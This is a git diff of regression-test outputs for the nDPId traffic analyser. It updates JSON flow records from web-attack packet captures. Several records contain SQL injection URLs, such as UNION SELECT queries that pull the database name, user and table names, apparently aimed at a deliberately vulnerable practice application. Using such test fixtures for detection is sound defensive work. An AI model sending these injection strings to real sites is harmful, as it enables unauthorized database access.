+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348506489,"flow_last_seen":1499348506490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348506490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348514064,"flow_last_seen":1499348514064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348514064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499348514064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tHhAAD4GEVisEAABwKgKMo10AFC7kHpqAAAAAKACchDL8wAAAgQFtAQCCAoBPs4SAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499348514064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXSy4nMxu5B6a6AScSADUQAAAgQFtAQCCAoD6J+FAT7OEgEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499348514065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348514065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tHlAAD4GEV+sEAABwKgKMo10AFC7kHprsuJzMoAQAOWiVwAAAQEICgE+zhMD6J+F"} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348514064,"flow_last_seen":1499348514065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348514065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348407419,"flow_last_seen":1499348412425,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348413192,"flow_last_seen":1499348418262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2300,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348422024,"flow_last_seen":1499348427063,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348433464,"flow_last_seen":1499348438551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4149,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348467295,"flow_last_seen":1499348472302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2021,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348480992,"flow_last_seen":1499348486002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1053,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348494345,"flow_last_seen":1499348499355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348506489,"flow_last_seen":1499348511497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1499348514064,"flow_last_seen":1499348519077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2701,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348514064,"flow_last_seen":1499348514065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348514065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348407419,"flow_last_seen":1499348412425,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348413192,"flow_last_seen":1499348418262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2300,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348422024,"flow_last_seen":1499348427063,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348433464,"flow_last_seen":1499348438551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4149,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348467295,"flow_last_seen":1499348472302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2021,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348480992,"flow_last_seen":1499348486002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1053,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348494345,"flow_last_seen":1499348499355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348506489,"flow_last_seen":1499348511497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1499348514064,"flow_last_seen":1499348519077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2701,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","packets-captured":94,"packets-processed":94,"total-skipped-flows":0,"total-l4-payload-len":23660,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":57,"global_ts_msec":1499348519077} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 94/94 @@ -63,9 +63,9 @@ ~~ total active/idle flows...: 9/9 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882611 bytes -~~ total memory freed........: 5882611 bytes -~~ total allocations/frees...: 118285/118285 +~~ total memory allocated....: 6016245 bytes +~~ total memory freed........: 6016245 bytes +~~ total allocations/frees...: 121047/121047 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 1075 chars diff --git a/test/results/WebattackXSS.pcap.out b/test/results/WebattackXSS.pcap.out index 2dfb5beb5..7d3c8d263 100644 --- a/test/results/WebattackXSS.pcap.out +++ b/test/results/WebattackXSS.pcap.out @@ -4,7 +4,7 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499346935283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wadAAD4GBCmsEAABwKgKMsuCAFAodgngAAAAAKACchCXWwAAAgQFtAQCCAoBOMhHAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499346935283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4I5j3VaKHYJ4aAScSBLsAAAAgQFtAQCCAoD4pm+ATjIRwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499346935285,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wahAAD4GBDCsEAABwKgKMsuCAFAodgnhOY91W4AQAOXqtwAAAQEICgE4yEcD4pm+"} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346935283,"flow_last_seen":1499346935285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346935285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346935283,"flow_last_seen":1499346935285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346935285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935343,"flow_last_seen":1499346935343,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935343,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499346935343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935343,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IaBAAD4GpDCsEAABwKgKMsuEAFAW1en2AAAAAKACchDI1AAAAgQFtAQCCAoBOMhWAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499346935343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935343,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4Rgmy17FtXp96AScSCd7QAAAgQFtAQCCAoD4pnNATjIVgEDAwc="} @@ -21,7 +21,7 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499346956870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956870,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DqpAAD4GtyasEAABwKgKMsvoAFDxddP2AAAAAKACchDuyQAAAgQFtAQCCAoBON1cAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499346956870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956870,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+g57n8P8XXT96AScSCD9QAAAgQFtAQCCAoD4q7TATjdXAEDAwc="} 